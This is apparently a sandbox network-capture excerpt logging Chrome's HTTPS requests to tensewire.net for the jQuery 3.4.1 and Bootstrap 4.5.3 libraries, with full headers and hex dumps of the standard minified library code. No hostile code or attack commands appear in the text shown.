                              2024-04-25 18:22:14 UTC1369INData Raw: 91 a8 5e 88 1c 15 c3 fc 68 72 0c f5 c2 e4 58 8e 89 79 c8 71 e4 ff d4 8b d2 a2 9d 88 7a 49 da 0e 6d 4d bd 34 ed 64 b4 93 53 2f 4f 3b 33 ed 5c d4 2b d2 ce 4b bb e4 f1 e4 8e da e5 69 57 a2 de 8c 76 15 da 55 a9 b7 a2 5d 87 76 53 ea 6d 68 37 23 51 ef 4a bb 25 ed 56 d4 bb d1 6e a3 44 bd 37 ed b6 b4 7b 52 ef 41 7b 84 12 f5 a1 b4 c7 d2 9e 4c 7d 18 ed 29 3a a0 3e 96 f6 54 da d3 86 7e 3a 9a e4 45 da f3 55 f6 a0 bd 5c f5 f1 b4 57 04 fd 4a 54 9f 40 7b 55 30 7f 0d ed b5 d4 27 d2 5e 87 f4 d0 5e af fa 64 f2 70 75 8e 0c 53 5d a8 6c 7f aa 8b 8f 68 64 66 aa 4b a8 2e 25 3b 80 ea 72 aa ab c9 0e a2 ba 8e ea 7a b2 c3 a9 ee a6 ba 97 ec 48 aa fb a4 ec 68 aa 07 94 1d 43 f5 60 d0 1f 42 d9 b1 54 0f 07 fd 11 94 1d 47 f5 68 d0 1f 27 31 fc 1d d5 13 54 4f 92 1d 4f f5 94 56 66 27 50 3d
                              Data Ascii: ^hrXyqzImM4dS/O;3\+KiWvU]vSmh7#QJ%VnD7{RA{L}):>T~:EU\WJT@{U0'^^dpuS]lhdfK.%;rzHhC`BTGh'1TOOVf'P=
                              2024-04-25 18:22:14 UTC1369INData Raw: 67 d1 c8 ff 52 9c 47 f9 27 52 5c 40 f9 b4 52 5c 4a c3 df 4b 71 19 8d bc 29 c5 d5 d4 dd 5a 8a 6b a8 bb b4 14 d7 56 da 75 d0 f0 bf 52 5c 4f c5 94 52 dc 42 9d 41 29 6e a5 e1 c3 a4 b8 8d 3a 13 48 71 27 15 b9 14 f7 d0 f0 57 52 dc 47 dd bd a5 b8 9f ba eb 4b f1 00 75 77 91 e2 41 ea 1e 28 c5 43 d4 3d 52 8a 47 29 df 5e 8a c7 29 5f 52 8a 27 68 e4 6e 29 9e a4 f2 48 29 9e a2 ce 3b 52 3c 43 c5 91 52 3c 4b 23 eb 4a f1 3c e5 1b 49 f1 22 15 97 49 f1 0a 65 0b 4a f1 1a e5 eb 49 f1 3a e5 3b 48 f1 06 e5 1b 4a f1 16 e5 db 49 f1 36 75 9e 95 e2 5d 2a ae 96 e2 03 ea 4c 2e c5 47 d4 59 5c 8a 4f a8 cc c3 0f a1 c1 67 a4 37 40 83 2f 48 1c 86 06 5f 93 70 3e 1a 7c 47 d2 de 68 f0 23 49 33 a2 c1 cf a4 99 0c 0d 8c f4 fe 41 83 21 12 3a 68 50 49 3e 16 59 97 e4 73 90 45 92 5f 47 d6 90 7c 12
                              Data Ascii: gRG'R\@R\JKq)ZkVuR\ORBA)n:Hq'WRGKuwA(C=RG)^)_R'hn)H);R<CR<K#J<I"IeJI:;HJI6u]*L.GY\Og7@/H_p>|Gh#I3A!:hPI>YsE_G|
                              2024-04-25 18:22:14 UTC1369INData Raw: 51 79 99 b4 5f a1 f2 0a 49 4b a1 f2 2a e9 9f 82 ca 6b 24 af 85 ca eb 24 3e 88 ca 1b 24 2c 8b ca e7 24 3c 89 ca 97 a4 e7 a8 fc 48 d2 29 a8 fc 44 d2 c9 a8 fc 46 da bd 50 f9 93 70 0c 2a 7f 93 3c 12 0d 7d 16 fb 83 71 e8 73 6a ba 7d 41 a5 7d 49 cd 6b 5f 51 cb b5 af 21 cd 36 68 e8 9b 9a 6e df 52 69 df 51 f3 da f7 d4 72 ed 07 6a ba fd 48 e4 8d 75 38 d1 4f 1d eb 08 6a ba 8d 03 49 d3 a0 3a 01 89 9b a3 3a 31 69 5e 41 75 4a 92 b6 43 75 7a 92 b6 47 75 66 d2 dd 02 d5 c5 49 5a 11 d5 25 48 bb 01 aa 4b 92 76 43 54 97 22 f1 22 54 57 20 cd 32 a8 ae 44 9a f5 50 5d 85 34 8b a3 ba 1a 69 af 42 75 0d d2 f9 01 d5 35 49 7b 26 aa 6b 91 ee b4 a8 ae 4d da e5 51 5d 87 74 9e 40 75 5d d2 3e 8f ea 7a a4 3b 26 aa eb 93 8e a3 ba 01 69 af 47 75 43 d2 de 81 ea 46 a4 3b 3e aa 9b 90 ee d8 a8
                              Data Ascii: Qy_IK*k$$>$,$<H)DFPp*<}qsj}A}Ik_Q!6hnRiQrjHu8OjI::1i^AuJCuzGufIZ%HKvCT""TW 2DP]4iBu5I{&kMQ]t@u]>z;&iGuCF;>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.2.449759104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:14 UTC629OUTGET /assets/vendors/jquery-3.4.1.min.js HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:14 UTC844INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:14 GMT
                              Content-Type: application/javascript
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 10:24:24 GMT
                              last-modified: Fri, 20 Aug 2021 13:04:53 GMT
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 201470
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2FeK%2FZ5Dr7dLMn7K73zDzw8pMGia1EfqZKWT7EhFMFSRWmDKo%2BtvChsTtcNDdMBpVQO3LONCzytwPRLv6RIeC2UfTsSJcVI9CPOztQ05S4v8KfCM1UT3U4UIU2%2FT7TfO"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b7b8b614578-ATL
                              2024-04-25 18:22:14 UTC525INData Raw: 37 62 62 31 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 34 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a
                              Data Ascii: 7bb1/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("j
                              2024-04-25 18:22:14 UTC1369INData Raw: 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 79 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 65 2e 6e 6f 64 65 54 79 70 65 7d 2c 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 65 3d 3d 3d 65 2e 77 69 6e 64 6f 77 7d 2c 63 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 6e 63 65 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 62 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 28 6e 3d 6e 7c 7c 45 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e
                              Data Ascii: all(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in
                              2024-04-25 18:22:14 UTC1369INData Raw: 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 75 2c 73 6f 72 74 3a 74 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 74 2e 73 70 6c 69 63 65 7d 2c 6b 2e 65 78 74 65 6e 64 3d 6b 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 75 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6c 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 6c 3d 61 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 73 5d 7c 7c 7b 7d 2c 73 2b 2b 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 6d 28 61 29 7c 7c 28 61 3d 7b 7d 29 2c 73 3d 3d 3d 75 26 26 28 61 3d 74 68 69 73 2c 73 2d 2d 29 3b 73 3c 75 3b 73 2b 2b 29 69
                              Data Ascii: ctor()},push:u,sort:t.sort,splice:t.splice},k.extend=k.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)i
                              2024-04-25 18:22:14 UTC1369INData Raw: 6e 20 65 2e 6c 65 6e 67 74 68 3d 69 2c 65 7d 2c 67 72 65 70 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 5b 5d 2c 69 3d 30 2c 6f 3d 65 2e 6c 65 6e 67 74 68 2c 61 3d 21 6e 3b 69 3c 6f 3b 69 2b 2b 29 21 74 28 65 5b 69 5d 2c 69 29 21 3d 3d 61 26 26 72 2e 70 75 73 68 28 65 5b 69 5d 29 3b 72 65 74 75 72 6e 20 72 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 30 2c 61 3d 5b 5d 3b 69 66 28 64 28 65 29 29 66 6f 72 28 72 3d 65 2e 6c 65 6e 67 74 68 3b 6f 3c 72 3b 6f 2b 2b 29 6e 75 6c 6c 21 3d 28 69 3d 74 28 65 5b 6f 5d 2c 6f 2c 6e 29 29 26 26 61 2e 70 75 73 68 28 69 29 3b 65 6c 73 65 20 66 6f 72 28 6f 20 69 6e 20 65 29 6e 75 6c 6c 21 3d 28 69 3d 74 28 65 5b 6f 5d 2c 6f 2c 6e 29 29
                              Data Ascii: n e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(d(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))
                              2024-04-25 18:22:14 UTC1369INData Raw: 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2a 28 5b 3e 2b 7e 5d 7c 22 2b 4d 2b 22 29 22 2b 4d 2b 22 2a 22 29 2c 55 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 7c 3e 22 29 2c 58 3d 6e 65 77 20 52 65 67 45 78 70 28 24 29 2c 56 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 49 2b 22 24 22 29 2c 47 3d 7b 49 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 23 28 22 2b 49 2b 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 49 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 49 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 57 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 24 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45
                              Data Ascii: w RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),U=new RegExp(M+"|>"),X=new RegExp($),V=new RegExp("^"+I+"$"),G={ID:new RegExp("^#("+I+")"),CLASS:new RegExp("^\\.("+I+")"),TAG:new RegExp("^("+I+"|[*])"),ATTR:new RegExp("^"+W),PSEUDO:new RegExp("^"+$),CHILD:new RegE
                              2024-04-25 18:22:14 UTC1369INData Raw: 68 69 6c 65 28 65 5b 6e 2b 2b 5d 3d 74 5b 72 2b 2b 5d 29 3b 65 2e 6c 65 6e 67 74 68 3d 6e 2d 31 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 65 28 74 2c 65 2c 6e 2c 72 29 7b 76 61 72 20 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 2c 63 2c 66 3d 65 26 26 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 70 3d 65 3f 65 2e 6e 6f 64 65 54 79 70 65 3a 39 3b 69 66 28 6e 3d 6e 7c 7c 5b 5d 2c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 21 74 7c 7c 31 21 3d 3d 70 26 26 39 21 3d 3d 70 26 26 31 31 21 3d 3d 70 29 72 65 74 75 72 6e 20 6e 3b 69 66 28 21 72 26 26 28 28 65 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 3a 6d 29 21 3d 3d 43 26 26 54 28 65 29 2c 65 3d 65 7c 7c 43 2c 45 29 29 7b 69 66 28 31 31 21 3d 3d 70 26 26 28 75 3d 5a 2e 65 78 65 63 28 74 29 29
                              Data Ascii: hile(e[n++]=t[r++]);e.length=n-1}}}function se(t,e,n,r){var i,o,a,s,u,l,c,f=e&&e.ownerDocument,p=e?e.nodeType:9;if(n=n||[],"string"!=typeof t||!t||1!==p&&9!==p&&11!==p)return n;if(!r&&((e?e.ownerDocument||e:m)!==C&&T(e),e=e||C,E)){if(11!==p&&(u=Z.exec(t))
                              2024-04-25 18:22:14 UTC1369INData Raw: 72 5d 5d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 70 65 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 26 26 65 2c 72 3d 6e 26 26 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 26 26 31 3d 3d 3d 74 2e 6e 6f 64 65 54 79 70 65 26 26 65 2e 73 6f 75 72 63 65 49 6e 64 65 78 2d 74 2e 73 6f 75 72 63 65 49 6e 64 65 78 3b 69 66 28 72 29 72 65 74 75 72 6e 20 72 3b 69 66 28 6e 29 77 68 69 6c 65 28 6e 3d 6e 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 6e 3d 3d 3d 74 29 72 65 74 75 72 6e 2d 31 3b 72 65 74 75 72 6e 20 65 3f 31 3a 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 65 2e 74 79 70 65 3d
                              Data Ascii: r]]=t}function pe(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&e.sourceIndex-t.sourceIndex;if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function de(t){return function(e){return"input"===e.nodeName.toLowerCase()&&e.type=
                              2024-04-25 18:22:14 UTC1369INData Raw: 61 6d 65 3d 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 43 2e 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 28 22 22 29 29 2c 21 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 2a 22 29 2e 6c 65 6e 67 74 68 7d 29 2c 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3d 4b 2e 74 65 73 74 28 43 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 2c 64 2e 67 65 74 42 79 49 64 3d 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 69 64 3d 6b 2c 21 43 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 43 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 6b
                              Data Ascii: ame=ce(function(e){return e.appendChild(C.createComment("")),!e.getElementsByTagName("*").length}),d.getElementsByClassName=K.test(C.getElementsByClassName),d.getById=ce(function(e){return a.appendChild(e).id=k,!C.getElementsByName||!C.getElementsByName(k
                              2024-04-25 18:22:14 UTC1369INData Raw: 4b 2e 74 65 73 74 28 43 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 29 29 26 26 28 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 69 64 3d 27 22 2b 6b 2b 22 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 69 64 3d 27 22 2b 6b 2b 22 2d 5c 72 5c 5c 27 20 6d 73 61 6c 6c 6f 77 63 61 70 74 75 72 65 3d 27 27 3e 3c 6f 70 74 69 6f 6e 20 73 65 6c 65 63 74 65 64 3d 27 27 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 73 65 6c 65 63 74 3e 22 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6d 73 61 6c 6c 6f 77 63 61 70 74 75 72 65 5e 3d 27 27 5d 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29
                              Data Ascii: K.test(C.querySelectorAll))&&(ce(function(e){a.appendChild(e).innerHTML="<a id='"+k+"'></a><select id='"+k+"-\r\\' msallowcapture=''><option selected=''></option></select>",e.querySelectorAll("[msallowcapture^='']").length&&v.push("[*^$]="+M+"*(?:''|\"\")
                              2024-04-25 18:22:14 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 3f 65 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3a 65 2c 72 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 65 3d 3d 3d 72 7c 7c 21 28 21 72 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 28 6e 2e 63 6f 6e 74 61 69 6e 73 3f 6e 2e 63 6f 6e 74 61 69 6e 73 28 72 29 3a 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 72 29 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 29 77 68 69 6c 65 28 74 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 74 3d 3d 3d 65 29 72 65 74 75 72 6e 21 30 3b 72
                              Data Ascii: nction(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              19192.168.2.449763104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:14 UTC645OUTGET /assets/vendors/bootstrap-4.5.3/js/bootstrap.min.js HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:14 UTC836INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:14 GMT
                              Content-Type: application/javascript
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 10:24:24 GMT
                              last-modified: Fri, 20 Aug 2021 13:04:53 GMT
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 201470
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QSh87WYZSnrbde3T9Y5ywe9CaSiAUSs%2FLplPW9GvkynrqZ1RGQ24KQh89xfCbPyhtM1ZeRi7K4bSEXIjOBNElmYpyoaVLbnfIkuY66ZVd1CRvOjywkaMIGtnS6ACicS0"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b7ce860b05d-ATL
                              2024-04-25 18:22:14 UTC533INData Raw: 37 62 62 61 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 35 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c
                              Data Ascii: 7bba/*! * Bootstrap v4.5.3 (https://getbootstrap.com/) * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,
                              2024-04-25 18:22:14 UTC1369INData Raw: 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 22 64 65 66 61 75 6c 74 22 69 6e 20 74 3f 74 3a 7b 64 65 66 61 75 6c 74 3a 74 7d 7d 76 61 72 20 6f 3d 69 28 65 29 2c 61 3d 69 28 6e 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c
                              Data Ascii: is,(function(t,e,n){"use strict";function i(t){return t&&"object"==typeof t&&"default"in t?t:{default:t}}var o=i(e),a=i(n);function s(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),
                              2024-04-25 18:22:14 UTC1369INData Raw: 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6f 2e 64 65 66 61 75 6c 74 28 74 29 2e 74 72 69 67 67 65 72 28 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61
                              Data Ascii: onEnd:function(t){o.default(t).trigger("transitionend")},supportsTransitionEnd:function(){return Boolean("transitionend")},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var i in n)if(Object.prototype.hasOwnProperty.ca
